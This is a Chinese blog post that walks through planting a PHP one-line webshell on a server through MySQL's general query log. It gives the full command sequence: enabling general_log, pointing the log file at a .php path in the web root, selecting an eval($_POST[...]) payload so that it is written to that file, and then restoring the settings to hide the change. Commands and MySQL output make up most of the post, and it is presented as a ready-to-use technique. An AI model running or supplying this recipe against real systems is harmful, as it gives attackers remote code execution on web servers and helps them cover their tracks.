利用mysql数据库的日志 添加一句话木马

  • 查看配置
show variables like '%general%';
 
mysql> show variables like '%general%';
+------------------+--------------------------------------------------------+
| Variable_name    | Value                                                  |
+------------------+--------------------------------------------------------+
| general_log      | OFF                                                    |
| general_log_file | D:\wamp\bin\mysql\mysql5.6.17\data\DESKTOP-U3B8JVN.log |
+------------------+--------------------------------------------------------+
2 rows in set (0.11 sec)
  • 开启general log模式
set global general_log = on;
  • 设定日志文件的位置
set global general_log_file = 'd:\\wwwroot\\test.php';
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';


<?php @eval($_POST['codervibe']); ?>
  • 插入 一句话木马
select '<?php @eval($_POST['codervibe']); ?>'
 
mysql> select '<?php @eval($_POST['codervibe']); ?>'
  • 关闭general log模式
set global general_log = off;
  • 连接完成后 将位置还原回 原来的设定并关闭
set global general_log_file = 'D:\\wamp\\www\\mysql_log\\codervibe_shell.php';
set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
  • 关闭数据库日志
set global general_log = off;  
mysql> show variables like '%general%';
+------------------+--------------------------------------------+
| Variable_name    | Value                                      |
+------------------+--------------------------------------------+
| general_log      | ON                                         |
| general_log_file | D:\wamp\www\mysql_log\codervibe_shell2.php |
+------------------+--------------------------------------------+
2 rows in set (0.00 sec)

mysql> set global general_log_file = 'D:\\wamp\\bin\\mysql\\mysql5.6.17\\data\\DESKTOP-U3B8JVN.log';
Query OK, 0 rows affected (0.09 sec)

mysql> set global general_log = off;
Query OK, 0 rows affected (0.06 sec)

总结

show variables like '%general%';             #查看配置
set global general_log = on;                 #开启general log模式
set global general_log_file = 'd:\\wwwroot\\test.php'; #设置日志目录为shell地址
select ''             #写入shell
set global general_log=off;                  #关闭general log模式

__EOF__

本文作者ZapcoMan
本文链接https://www.cnblogs.com/ZapcoMan/p/18455040.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   ZapcoMan  阅读(109)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae